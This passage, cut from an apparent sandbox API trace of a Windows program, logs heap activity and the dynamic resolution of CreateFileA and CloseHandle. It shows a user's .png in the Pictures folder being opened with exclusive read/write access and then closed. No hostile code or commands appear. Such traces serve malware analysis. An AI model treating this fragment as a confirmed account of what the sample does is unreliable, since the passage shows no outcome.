Flags=0x0, Size=0x10) returned 0x9bd810 [0191.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0191.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0191.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd858 [0191.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd858, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0191.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0191.031] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0191.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0191.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0191.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0191.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0191.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0191.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0191.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0191.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0191.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0191.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0191.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0191.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0191.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0191.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\_jWe.png", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0191.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x41) returned 0x9aa548 [0191.032] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\_jWe.png", cchWideChar=65, lpMultiByteStr=0x9aa548, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\_jWe.png", lpUsedDefaultChar=0x0) returned 65 [0191.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa548 | out: hHeap=0x8a0000) returned 1 [0191.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0191.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0191.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0191.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0191.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0191.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0191.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0191.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0191.032] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\_jWe.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\_jwe.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0191.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0191.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0191.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0191.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0191.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0191.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0191.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0191.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0191.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0191.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0191.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0191.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0191.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0191.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0191.033] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=65, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0191.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x82) returned 0x907778 [0191.033] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=65, lpWideCharStr=0x907778, cchWideChar=65 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\_jWe.png") returned 65 [0191.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0191.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0191.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0191.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0191.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0191.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0191.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0191.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0191.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0191.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0191.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0191.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0191.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0191.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0191.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0191.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0191.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0191.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0191.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0191.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0191.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0191.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0191.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0191.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0191.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0191.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0191.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0191.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0191.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0191.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0191.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0191.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0191.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0191.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0191.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0191.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0191.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0191.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0191.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0191.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0191.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0191.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0191.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0191.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0191.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0191.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0191.035] FreeLibrary (hLibModule=0x75990000) returned 1 [0191.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0191.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0191.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0191.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0191.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0191.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0191.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0191.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0191.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0191.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0191.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0191.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0191.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0191.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0191.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0191.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0191.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0191.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0191.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0191.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0191.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0191.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0191.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0191.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0191.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0191.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0191.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0191.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0191.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0191.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0191.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0191.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0191.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0191.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0191.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0191.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0191.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0191.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0191.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0191.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0191.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0191.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0191.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0191.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0191.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0191.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0191.037] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0191.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0191.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0191.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0191.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0191.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0191.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0191.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0191.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0191.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0191.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0191.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0191.037] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0191.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0191.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0191.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0191.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0191.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0191.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0191.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0191.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0191.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0191.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0191.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0191.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0191.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0191.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0191.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0191.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0191.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0191.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0191.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0191.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0191.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0191.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0191.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0191.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0191.038] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0191.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0191.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0191.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0191.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0191.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0191.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0191.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0191.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0191.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0191.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0191.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0191.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0191.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0191.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0191.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0191.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0191.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0191.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0191.039] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0191.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0191.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0191.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0191.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4c8 [0191.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd4c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0191.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0191.039] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0191.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0191.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0191.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0191.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0191.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0191.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0191.040] CloseHandle (hObject=0x160) returned 1 [0191.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0191.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0191.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0191.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0191.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0191.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0191.040] FreeLibrary (hLibModule=0x75990000) returned 1 [0191.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0191.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0191.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 